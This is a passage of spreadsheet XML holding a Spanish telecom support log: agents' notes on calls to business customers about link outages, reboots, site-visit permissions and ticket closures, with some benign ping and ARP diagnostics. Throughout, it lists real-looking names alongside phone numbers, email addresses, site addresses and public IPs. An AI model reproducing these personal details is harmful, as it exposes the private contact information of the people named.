-ID 2001158932</t>
  </si>
  <si>
    <t>F4594477</t>
  </si>
  <si>
    <t>SE LLAMA A LA AGENCIA SIN EMBARGO NO TIENE TONO
MELCHOR DE MENCOS
DIRECCIÓN: BARRIO EL CENTRO, CALLE PRINCIPAL A UN COSTADO DEL JUZGADO DE PAZ.
TEL: 7926-5142 / 7926-5798
HORARIO DE ATENCIÓN: 8:00 ¿ 17:00 DE LUNES A VIERNES
2001050487
COLA:
NOMBRE: A: 79265798
NÚMERO: 79265798
DURACIÓN: 0:00:07
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA:DESTINO FUERA DE SERVICIO (CÓDIGO CAUSA ISDN 27)/480:SIP - NO DISPONIBLE TEMPORALMENTE]
DETALLES: 79265798
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 8/06/2022 15:03:31</t>
  </si>
  <si>
    <t>F4594487</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE NORBIT ARIAZA AL 55550158 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 2001059088
**</t>
  </si>
  <si>
    <t>F4594489</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE KARLA LUNA AL 24744871 INDICA QUE HA ESTADO INESTABLE QUE A CADA RATO SE LE CAE EL SERVICIO || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
-ID  2001060390
**</t>
  </si>
  <si>
    <t>F4594494</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ERNESTO HUEZO 77364852, SE NECESITA INFORMAR QUE SE CONTINUA CON SEGUIMIENTO DE SU INCIDENTE PERO NO CONTESTO, ID: 2001311946.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ERNESTO HUEZO 77364852 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001809832</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  ERNESTO HUEZO  AL 77364852  NO RESPONDE || ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 2001876193
**</t>
  </si>
  <si>
    <t>F4594501</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE NATHALIA ZELAYA, SE INDICA QUE AUN NO TIENE SERVICIO, SE LE NOFICA QUE SE OBSERVA UN EQUPO CON IP 201.247.147.177 , QUE NO LOGRA COMPLETAR EL ARP POR LO QUE SE DEBERA REVISAR, CLIENTE MENCIONA QUE LUEGO DE UN CORTE DE ENERGIA SE QUEDARON SI SERVICIO Y QUE ESTARAN REVISANDO EL EQUIPO INTERNO EN MENCION POR LO QUE AUTORIZA CIERRE TICKET.
2001050055
COLA:
NOMBRE: A: 0050374590489
NÚMERO: 0050374590489
DURACIÓN: 0:12:02
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 0050374590489
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 8/06/2022 15:13:22</t>
  </si>
  <si>
    <t xml:space="preserve"> #HERRAMIENTA_UTILIZADA ARK
 PING EXITOSO: NO HAY PERDIDAS DE PAQUETES HACIA LA IP WAN.
PING -M 30 -C 100 -S 100  -Q  -VPN INTERNET_ID_ESV 10.149.36.37
  PING 10.149.36.37: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.149.36.37 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/2/3 MS</t>
  </si>
  <si>
    <t>F4594502</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AHIEZER RAMIREZ AL 24199999 EXT 1666 NO RESPONDE || SE INTENTARA LUEGO **
-ID 2001126832
**</t>
  </si>
  <si>
    <t>F4594508</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WINTER RODRIGUEZ 35193215 NO SE LOGRA LA COMUNICACION, SE INTENTARA LUEGO
-ID 2001085898</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  VICTOR PERALTA 46153837 NO SE TIENE RESPUESTA, SE INTENTARA LUEGO
-ID 2001078563</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WINTER RODRIGUEZ 35193215 SUENA DESCONECTADO
-ID 2001078206</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WINTER RODRIGUEZ AL 35193215  NO RESPONDE || SE INTENTARA LUEGO**
-ID 2001062951
**</t>
  </si>
  <si>
    <t xml:space="preserve">	WO OPEN                        		SD	9:02 A. M.
1/4	JORGE FINGADO	58261199	2 HORAS	11:02 A. M.
2/4	JORGE FINGADO	58261199	3 HORAS	12:02:00
3/4	RENE AGUSTIN	58261183	5 HORAS	14:02:00
4/4	RODOLFO MORALES	58261609	6 HORAS	15:02:00</t>
  </si>
  <si>
    <t>TECNICOS ESTIMAN LLEGAR EN 20 MINUTOS  A SITIO</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE   VICTOR PERALTA AL 46153837  INDICA QUE YA HIZO REINICIO PERO LO Q NO TIENE ES ADMINISTRACION DEL EQUIPO FORTINET Y EL TIENE 2 IP LA PRIMARIA ES LA IP PUBLICA EN LA CUAL NO TIENE ACCESO Y  LA SECUNDARIA SI TIENE ADMINISTRACION || SE LE  COMENTA A GESTOR Y SE LE SOLICITAN DATOS DE VISITA **
HORARIO DE ATENCION: 8:30 A 17:00 PM
GESTION DE PERMISOS: SE NECESITAN PERMISOS ENVIAR CORREO CON EL LISTADO DE PERSONAL TEC AL CORREO VPERALTA@GENESISEMPRESARIAL.COM
DIRECCION: 21 AVE. 2-49 ZONA 3 QUETZALTENANGO
ATENDERA EN SITIO: OLGA GARCIA
-ID 2001140024
**</t>
  </si>
  <si>
    <t>**SE LLAMA AL  VICTOR PERALTA AL 46153837 SOLICITA APOYO PARA RECUPERAR GESTION DEL FORTINET YA QUE NO TIENE ACCESO A LA IP INDICA || SE NOTIFICA A GESTOR **
-ID 2001137933
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VICTOR PERALTA 46153837 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 2001086251</t>
  </si>
  <si>
    <t>F4594517</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  52 55 5174 5290 RESPONDE RAUL QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001079502</t>
  </si>
  <si>
    <t>F4594518</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE TIENE VARIOS EQUIPOS Y SOLICITA SE EL CONFIGURE DHCP, SE LE CONFIGURA, SE VALIDA QUE SE CONECTAN EQUIPOS, CLIENTE SATISFECHO AUTORIZA CIERRE DE CASO
NÚMERO: 0050588785034
FIN: HOY, 15:37
ID DE LLAMADA: 2001059375</t>
  </si>
  <si>
    <t>F4594521</t>
  </si>
  <si>
    <t>SE LLAMA A CONTACTO UBICADO EN TICKETS ANTERIORES EDUARDO LEMUS 40713729 CONMENTA QUE YA NO ES EL ENCARDO DE LA IGLESIA PROPORCIANA CONTACTO EDER ZACARIAS 40211727. SIN EMBARGO ENVIA A BUZON LA LLAMADA.
2001053024
COLA:
NOMBRE: A: 40713729
NÚMERO: 011 50240713729
DURACIÓN: 0:02:18
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: +50240713729
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 8/06/2022 15:12:06</t>
  </si>
  <si>
    <t>SABLA CON EDER COMENTA QUE NO SE ENCUENTRA EN SITIO COMENTO QUE PROPORCIONARIA UN CONTACTO LUEGO COMENTO QUE NO TIENE A NADIE PARA QUE VALIDARA PUNTO REMOTO. SE LE BRINDO TELEFONO DE CNOC SE LE INDICO QUE SI VALIDASE TEME DE ENERGIA,  SI NECESITA APOYO LLAMARA A CLARO.
2001055037
COLA:
NOMBRE: A: 40211727
NÚMERO: 011 50240211727
DURACIÓN: 0:06:39
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: +50240211727
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 8/06/2022 15:23:48</t>
  </si>
  <si>
    <t>CONTACTO EDER ZACARIAS 40211727. SIN EMBARGO ENVIA A BUZON LA LLAMADA.
2001053803
COLA: CNOCPROACTIVO
NOMBRE: DE: 79453360
NÚMERO: 79453360
DURACIÓN: 0:01:45
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 79453360
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 8/06/2022 15:14:23</t>
  </si>
  <si>
    <t>F4594564</t>
  </si>
  <si>
    <t>SE CONVERSO CON CLIENTE  GERSON HERNANDEZ, SE LE INDICO EL DIAGNOSTICO Y ESTADO DEL EQUIPO CON IP 186.151.203.6, MENCIONA QUE LO ESTARA REVISANDO Y AUTORIZA CIERRE DE TICKET.
2001068120
COLA:
NOMBRE: A: 58698822
NÚMERO: 58698822
DURACIÓN: 0:05:33
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 58698822
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 8/06/2022 16:03:47</t>
  </si>
  <si>
    <t>F4594573</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. EDUARDO VALDEZ 31820080 INFORMA QUE LOS EQUIPOS ESTAN ENCENDIDOS, APLICO REINICIO PERO ENLACE NO LEVANTO.</t>
  </si>
  <si>
    <t>F4594586</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE TRUJILLO 54531730 MENCIONA QUE NO TIENEN MUCHA SEÑAL MOVIL
SE LE INDICA QUE A NIVEL DE CLARO TODO ESTA FUNCIONANDO CORRECTAMENTE, CLIENTE INDICA QUE VALIDARA CON SU IT
-ID 2001068689</t>
  </si>
  <si>
    <t>F4594593</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ROY FILLE 506 60243407 ENVIA DIRECTO A BUZON, SE INTENTARA LUEGO
-ID 3001083432</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GABRIEL SALGUERO 506 25434833 CONFIRMA SERVICIO ESTABLE Y OPERATIVO ||
 AUTORIZA CIERRE DE TICKET **
-ID 2001165005
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GABRIEL SALGUERO 506 25434833 MENCIONA QUE YA NO SE ENCUENTRA EN PR POR LO QUE SOLICITA SEGUIMIENTO MAÑANA A LAS 9:30
-ID 2001083683</t>
  </si>
  <si>
    <t>F4594597</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDGAR FERNANDO GUZMAN RAXON AL 3048 1583 SOLICITA QUE SE LLAME AL SEÑOR JORGE HERNANDEZ  AL 58652751 **
-ID 2001135713
**</t>
  </si>
  <si>
    <t>****SE LLAMA A CLIENTE  JORGE HERNANDEZ  AL 58652751 NO RESPONDE || ENVIA A BUZON || SE INTENTARA LUEGO**
-ID 2001136257
**</t>
  </si>
  <si>
    <t>F4594599</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GLENDA VELASQUEZ 78594307 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001201194</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GLENDA VELASQUEZ 60234397 MENCIONA QUE YA TODO ESTA FUNCIONANDO BIEN DESDE AYER
NO HAY PROBLEMA EN SACAR NI RECIBIR LLAMADAS
-ID 2001363898</t>
  </si>
  <si>
    <t>CLIENTE YOANNA 60234397 NO CONTESTA, SE DARÁ SEGUIMIENTO EL DÍA DE MAÑANA EN HORARIO HÁBIL</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  YOANNA 60234397 NO RESPONDE, SE INTENTARA LUEGO **
-ID 2001245450
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GLENDA VELASQUEZ 78594307 NO RESPONDE, ENVIA A BUZON | SE INTENTARA LUEGO **
-ID 2001245450
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE YOANNA 78594307  NO RESPONDE, SE INTENTARA LUEGO**
-ID 2001292246
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE YOANNA 78594307  NO RESPONDE, SE INTENTARA LUEGO
-ID 2001277294 - 2001277865</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL YOANNA  AL 60234397  INDICA QUE NO HA PODIDO COMUNICARSE CON EL PROVEEDOR SOLICITA QUE SE LE LLAME EN 1 HR NUEVAMENTE **
-ID 2001150857
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GLENDA VELASQUEZ  60234397 IVR INDICA QUE ESTA PENDIENTE DE INSTALACION
-ID 2001276923</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  YOANNA 60234397 NO RESPONDE, SE INTENTARA LUEGO **
-ID 2001215898
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GLENDA VELASQUEZ 78594307 NO RESPONDE, ENVIA A BUZON | SE INTENTARA LUEGO **
-ID 2001215421
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  YOANNA 60234397 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001203233 - 2001202413</t>
  </si>
  <si>
    <t>F4594603</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NANCY CHAVEZ-50166600 ##VIVO</t>
  </si>
  <si>
    <t>F4594617</t>
  </si>
  <si>
    <t>SE CONVERSO CON CLIENTE GABRIELA GIRON, CONFIRMA SERVICIO OPERATIVO Y AUTORIZA CIERRE DE CASO
2001078426
COLA:
NOMBRE: A: 54603332
NÚMERO: 54603332
DURACIÓN: 0:01:04
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 54603332
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 8/06/2022 16:33:20</t>
  </si>
  <si>
    <t>F4594621</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE MICHEL SITUMUL QUIEN INDICA QUE EL SERVICIO SE ENCUENTRA INESTABLE.
INDICA QUE EL DIA DE HOY SE RETIRAN A LAS 17:00HRS POR LO QUE SOLICITA VISITA TECNICA PARA EL DIA DE MAÑANA A LAS 9:00AM
2001075420
COLA:
NOMBRE: A: 31280654
NÚMERO: 011 50231280654
DURACIÓN: 0:01:19
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA:NORMAL, ESPECIFICADA (CÓDIGO CAUSA ISDN31)]
DETALLES: +50231280654
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 8/06/2022 16:24:18</t>
  </si>
  <si>
    <t>SE ENVIO CORREO AL CLIENTE SOLICITANDO LOS PERMISOS DE ACCESO. PARA EL DIA DE MAÑANA A LAS 9:00AM
BUENAS NOCHES,
ESTIMADOS POR ESTE MEDIO SOLICITO EL INGRESO A LOS TÉCNICOS PARA EL DÍA DE MAÑANA PARA REVISIÓN DEL E1 TELEFÓNICO 22173750
PARA EL DÍA DE MAÑANA EN HORARIO DE AGENCIA.
ADJUNTO DATOS DE LOS TÉCNICOS.
SALUDOS.</t>
  </si>
  <si>
    <t>SE ENVIO CORREO AL CLIENTE SOLICITANDO LOS PERMISOS PARA EL DIA DE MAÑANA.
BUENAS TARDES,
ESTIMADOS POR ESTE MEDIO SOLICITO DE SU APOYO PARA EL INGRESO DEL PERSONAL TÉCNICO A LAS INSTALACIONES PARA EL DÍA DE MAÑANA EN HORARIO DE AGENCIA PARA LA REVISIÓN DEL E1.
QUEDO A LA ESPERA DEL CORREO DE CONFIRMACIÓN.</t>
  </si>
  <si>
    <t>F4594623</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS ISRAEL DÍAZ MACHUCA AL 22399702 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 2001086370
**</t>
  </si>
  <si>
    <t>F4594625</t>
  </si>
  <si>
    <t>SE LLAMA NUEVAMENTE AL NUMERO 79242192 ATIENDE MARIELA HERNANDEZ QUIEN INDICA QUE EL PROBLEMA DE ENERGÍA CONTINUA E INDICA QUE TIENEN FECHA APROXIMADA DEL DÍA DE MAÑANA, POR LO QUE SE SOLICITA QUE SE DE SEGUIMIENTO EL DÍA 16 DE JUNIO A LAS 16;00 PARA VALIDAR SI SE ENTREGARON LAS PIEZAS PARA REPARAR EL REGULADOR DE ENERGÍA Y SOLVENTAR EL INCONVENIENTE
3001356179
COLA:
NOMBRE: A: 79242192
NÚMERO: 79242192
DURACIÓN: 0:01:35
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 79242192
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 15/06/2022 12:58:49</t>
  </si>
  <si>
    <t>SE LLAMA NUEVAMENTE AL NUMERO 79242192 ATIENDE MARIELA HERNANDEZ QUIEN INDICA QUE EL PROBLEMA DE ENERGÍA CONTINUA E INDICA QUE TIENEN FECHA APROXIMADA DEL DÍA DE MAÑANA, POR LO QUE SE SOLICITA QUE SE DE SEGUIMIENTO EL DÍA 16 DE JUNIO A LAS 16;00 PARA VALIDAR SI SE ENTREGARON LAS PIEZAS PARA REPARAR EL REGULADOR DE ENERGÍA Y SOLVENTAR EL INCONVENIENTE</t>
  </si>
  <si>
    <t>F4594627</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SIRIANA AVILA 41578698  MWNCIONA QUE PERSISTE EL INCONVENIENTE, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 2001074689</t>
  </si>
  <si>
    <t>F4594639</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARISELDA MENDOZA AL 45071356 SE CONTACTA A CLIENTE Y SE DEJA EN LINEA CON GESTOR **
-ID 2001084611
**</t>
  </si>
  <si>
    <t>|| SE LE ENVIA POR CORREO DATOS A CLIENTE SOLICITANDO VISITA PARA MAÑANA 8 HRS || PENDIENT ERESPUESTA
ASUNTO: SOLICITUD VISITA TÉCNICA ID: 825300026T || SECRETARIA DE PLANIFICACION Y PROGRAMACION DE LA PRESIDENCIA || 4A CALLE, ZONA 1, BARRIO EL CENTRO
MUY BUENA TARDE ESTIMADOS.
EN SEGUIMIENTO AL SERVICIO REPORTADO ID: 825300026T || SECRETARIA DE PLANIFICACION Y PROGRAMACION DE LA PRESIDENCIA || 4A CALLE, ZONA 1, BARRIO EL CENTRO, EDIFICIO MUNICIPAL DE SAN PEDRO SOLOMA.
LE COMENTO SE ESTÁ COORDINANDO UNA VISITA TÉCNICA PARA EL DÍA DE MAÑANA JUEVES 09/06 A PARTIR DE LAS 8:00 HRS. SOLICITAMOS NOS PUEDAN APOYAR EN GESTIONAR ACCESOS.
ADJUNTO LOS DATOS DEL PERSONAL TÉCNICO ASIGNADO.
JAVIER RAYMUNDO IBM:710125</t>
  </si>
  <si>
    <t>VISITA PARA MAÑANA JUEVES A LAS 8:00 HRS || CLIENTE AUTORIZA VISITA
JULIO ERNESTO RAMÍREZ TELÓN &lt;JULIO.RAMIREZ@SEGEPLAN.GOB.GT&gt;
BUENAS NOCHES.
UN GUSTO SALUDARLES, ME INFORMA NUESTRA COMPAÑERA EN EL SITIO MARICELDA MENDOZA, QUE PUEDEN LLEGAR EL DÍA DE MAÑANA A LA HORA INDICADA, POR CUALQUIER CONSULTA ESTAMOS A LAS ÓRDENES.
SALUDOS.</t>
  </si>
  <si>
    <t>SE LAMA A CLIENTE JULIO RAMIREZ 42071702 PARA BRINDAR RETROALIMENTACION PERO NO RESPONDE
-ID 2001156869</t>
  </si>
  <si>
    <t>SE LAMA A CLIENTE MARISELDA MENDOZA 45071356 PARA BRINDAR RETROALIMENTACION
-ID 2001155723</t>
  </si>
  <si>
    <t>F4594648</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SAIDA BARRERA 60379617  21320250 INDICA QUE POR EL MOMENTO ESTA ESTABLE EL SERVICIO PERO SOLICITA QUE SE LE DE SEGUIMIENTO A LAS 15:00 HRS PARA CONFIRMAR **
-ID 2001196271 - 2001196397
**</t>
  </si>
  <si>
    <t>CLIENTE SAIDA BARRERA 60379617 VALIDA QUE EL E1 SE ENCUENTRA OPERATIVO SIN INCONVENIENTES, SOLICITA SE VALIDE NUEVAMENTE A LAS 11 AM. ID:2001148820</t>
  </si>
  <si>
    <t>F4594658</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 9 DE JUNIO DE 2022 9:34
PARA: GERSON NICOLAS AJPACAJA PONCIO &lt;GERSON.AJPACAJA@CLARO.COM.GT&gt;; AHMARIAN@UNINET.COM.MX &lt;AHMARIAN@UNINET.COM.MX&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: 1259104OH || CARGILL DE HONDURAS SRL -
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4594671</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94671
ID: 97100192T
IDENTIFICADOR DEL CLIENTE: CC_PRONE_GT_SUPER_24_JUAN_GAVIOTA
UBICADO EN: ALDEA EL CARRIZAL MUNICIPIO DEL PUERTO DE SAN JOSE ESCUINTLA LOTE 4 13 55 35.6 N 90 56 32 2W
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4594680</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SRTA. SIRIANA AVILA 41578698  NOS COMUNICA A NOE HERNANDEZ SE LE SOLICITA QUE APLIQUE REINICIO A SU EQUIPO ZYXEL Y MICROTIC, DESPUES DEL REINICIO VALIDAN ENLACE OPERATIVO Y ESTABLE, AGRADECE EL APOYO YA QUE LOGRARON SOLVENTAR EL PROBLEMA LAN SE LE RECOMIENDO INSTALAR UPS PARA SUS EQUIPOS INTERNOS, ID: 2001087069.
744D.2888.498C
ROUTERBOARD.COM
BCCF.4FB8.88BF
ZYXEL COMMUNICATIONS CORPORATION</t>
  </si>
  <si>
    <t>F4594687</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE YORDI MAYEN 47930848 MENCIONA QUE YA NO SE ENCUENTRA EN PR POR LO QUE SOLICITA LLAMADA PARA MAÑANA A LAS  8:00 HRS
-ID 2001091363</t>
  </si>
  <si>
    <t>JORDI MAYEN AL 47930848  SE LE INFORMA QUE A NIVEL DE CLARO SE OBSERVA ENLACE OPERATIVO, SE LE SOLICITA REVISAR SU RED LAN, VALIDAR SU FW UBIQUITI, SE LE PROPORCIONAN LOS DATOS DE SU IP PIBLICA PARA QUE PUEDA CONECTAR UNA PC DIRECTAMENTE AL ROUTER DE CLARO, CONFIRMA DE ENTERADO REVISARA SU LAN, SE PROCEDE AL CIERRE DEL INCIDENTE.
ID: 2001151111
B4FB.E4E5.0533
UBIQUITI NETWORKS INC.
INDUSTRIA_LATEX#  SH ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.187.144.9            2   A4BE.2BE5.7F1F  ARPA   GIGABITETHERNET0/0.1366
INTERNET  10.187.144.10           -   78DA.6E45.D9A0  ARPA   GIGABITETHERNET0/0.1366
INTERNET  200.6.229.137           -   78DA.6E45.D9A1  ARPA   GIGABITETHERNET0/1
INTERNET  200.6.229.138           0   INCOMPLETE      ARPA
INTERNET  200.6.229.139           4   B4FB.E4E5.0533  ARPA   GIGABITETHERNET0/1
INTERNET  200.6.229.140           0   INCOMPLETE      ARPA
INTERNET  200.6.229.141           0   INCOMPLETE      ARPA
INTERNET  200.6.229.142           0   INCOMPLETE      ARPA
INDUSTRIA_LATEX#!!!
CONEXION HACIA INTERNET:
INDUSTRIA_LATEX#PING 8.8.8.8 SOURCE GIGABITETHERNET 0/1
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 8.8.8.8, TIMEOUT IS 2 SECONDS:
PACKET SENT WITH A SOURCE ADDRESS OF 200.6.229.137
!!!!!
SUCCESS RATE IS 100 PERCENT (5/5), ROUND-TRIP MIN/AVG/MAX = 48/49/52 MS</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE YORDI MAYEN AL 47930848  SOLICITA QUE SE LE LLAME EN 25 MIN NUEVAMENTE **
-ID 2001129523
**</t>
  </si>
  <si>
    <t>F4594697</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 2420-7200 EXT 1 PARA SEGUIMIENTO, NO CONTESTA; SE DEBE LLAMAR MAÑANA A LAS 08:00AM; ADICIONAL SE PIDE APOYO VÍA CORREO:
ASUNTO: RE: [SOLICITUD :##RE-759919##] : CAJEROS ATM ATM2717 CAIDA DE SERVICIO</t>
  </si>
  <si>
    <t>F4594704</t>
  </si>
  <si>
    <t>SE LLAMO A CLIENTE ATENDIO MARIO GUERRA APOYA REALIZANDO PRUEBAS, SE LE INDICO QUE OBSERVARA EL ID 8901228T PERO COMENTO QUE EN NINGUN LUGAR DE LOS EQUIPOS LO UBICO, SE REALIZARON PRUEBAS EN EL ROUTER CISCO, INTERFACE GE0/0 HACIA EQUIPO RAD, EN EL EQUIPO RAD SE REINICIO SE VALIDO CONEXIONES HACIA CPE SE REINCIO, COMENTO CLIENTE QUE EN LED ALM ESTABA EN ROJO AL REINCIAR CAMBIO A VERDA UN MOMENTO PARA LUEGO QUEDARSE EN COLOR ROJO, SE ESTA AL PEDIENTE DE QUE INGENIERIA PASE LOS DATOS DEL DISEÑO:
RESULTADO: LLAMADA HECHA
NOMBRE: 58494629
NÚMERO: 58494629
INICIO: HOY, 16:04
FIN: HOY, 16:19
DURACIÓN: 14:29
ID DE LLAMADA: 3001417280</t>
  </si>
  <si>
    <t>SE INTENTA LLAMAR A AGENCIA PERO NO SE LOGRA COMUNICACION
DE: MONICA ESTEFANIA BETSABE MARROQUIN SHUTUC &lt;MONICAE.MARROQUIN@CLARO.COM.GT&gt;
ENVIADO: LUNES, 13 DE JUNIO DE 2022 13:39
PARA: TELEMATICAGT@BACCREDOMATIC.GT &lt;TELEMATICAGT@BACCREDOMATIC.GT&gt;;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DREGALADOC@BACCREDOMATIC.GT &lt;DREGALADOC@BACCREDOMATIC.GT&gt;; LCASTANEDAC@BACCREDOMATIC.GT &lt;LCASTANEDAC@BACCREDOMATIC.GT&gt;; TELEMATICAGT@CREDOMATIC.GT &lt;TELEMATICAGT@CREDOMATIC.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;; GERIZIM SINAI RAMIREZ CALDERON &lt;GERIZIM.RAMIREZ@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE ALARMADO PARA EL CLIENTE CREDOMATIC S.A.
ESTIMADO CLIENTE,
LE SALUDO CORDIALMENTE, AL MISMO TIEMPO SOLICITO SU ACOSTUMBRADO APOYO BRINDANDO CONTACTOS DE LA SIGUIENTE AGENCIA:
TICKET:  F4589073
ID: 8600208T
IDENTIFICADOR DEL CLIENTE:  CC_CREDOMATIC_GT_INTERNET_AGENCIA_0089
UBICADO EN:  INTERNET_CALZADA ROOSEVELT 32-26, ZONA 7, GUATEMALA, GUATEMALA
ESTO DEBIDO A QUE TENEMOS UNA ALARMA PROACTIVA SOBRE LA CAÍDA DEL SERVICIO.
DE ANTEMANO MUCHAS GRACIAS POR EL APOYO.
SALUDOS,</t>
  </si>
  <si>
    <t>###CLIENTE BRINDA ACCESO PARA IDENTIFICAR EN INCOVENIENTE EN LAS INSTALACIONES DEL CLIENTE##
DE: TIC GONZÁLEZ, ANIBAL &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;
ENVIADO: JUEVES, 16 DE JUNIO DE 2022 8:11
